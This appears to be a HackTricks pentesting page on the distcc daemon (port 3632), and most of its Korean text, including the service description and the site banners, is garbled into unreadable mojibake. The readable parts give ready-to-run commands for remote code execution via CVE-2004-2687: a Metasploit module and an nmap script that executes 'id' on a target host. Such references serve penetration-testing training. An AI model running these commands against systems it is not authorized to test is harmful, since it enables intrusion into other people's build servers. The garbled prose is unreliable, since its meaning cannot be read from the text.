Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.
๊ธฐ๋ณธ ์ ๋ณด
Distcc๋ ๋คํธ์ํฌ์ ๋ค๋ฅธ ์ปดํจํฐ์ ์ ํด ์ฒ๋ฆฌ ๋ฅ๋ ฅ์ ํ์ฉํ์ฌ ์ปดํ์ผ ํ๋ก์ธ์ค๋ฅผ ํฅ์์ํค๋ ๋๊ตฌ์ ๋๋ค. distcc๊ฐ ๋จธ์ ์ ์ค์ ๋๋ฉด, ์ด ๋จธ์ ์ ๋ค๋ฅธ ์์คํ ์ ์ปดํ์ผ ์์ ์ ๋ถ๋ฐฐํ ์ ์์ต๋๋ค. ์ด ์์ ์์คํ ์ distccd ๋ฐ๋ชฌ์ด ์คํ ์ค์ด์ด์ผ ํ๋ฉฐ, ์ ์ก๋ ์ฝ๋๋ฅผ ์ฒ๋ฆฌํ ์ ์๋ ํธํ ๊ฐ๋ฅํ ์ปดํ์ผ๋ฌ๊ฐ ์ค์น๋์ด ์์ด์ผ ํฉ๋๋ค.
๊ธฐ๋ณธ ํฌํธ: 3632
PORT STATE SERVICE
3632/tcp open distccd
Exploitation
CVE-2004-2687์ ์ทจ์ฝํ์ง ํ์ธํ์ฌ ์์ ์ฝ๋๋ฅผ ์คํํฉ๋๋ค:
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
Shodan
์ด ์๋น์ค๋ shodan์ด ํ์งํ์ง ์๋ ๊ฒ ๊ฐ์ต๋๋ค.
Resources
- https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
- https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
Post created by รlex B (@r1p)
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.


